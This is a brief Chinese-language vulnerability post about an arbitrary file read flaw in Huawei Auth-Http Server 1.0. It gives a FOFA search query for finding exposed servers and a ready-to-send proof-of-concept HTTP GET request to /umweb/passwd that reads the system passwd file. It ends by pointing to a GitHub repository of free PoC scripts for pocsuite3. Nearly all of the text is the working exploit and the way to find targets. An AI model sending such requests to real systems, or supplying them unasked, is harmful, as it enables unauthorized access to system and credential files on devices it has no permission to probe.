华为Auth-Http Server 1.0存在任意文件读取,攻击者可通过该漏洞读取任意文件。
fofa查询
server="Huawei Auth-Http Server 1.0"读取passwd文件 POC
GET /umweb/passwd HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1
pocsuite3漏洞检测
漏洞检测脚本已上传免费漏洞库
地址:
https://github.com/Vme18000yuan/FreePOC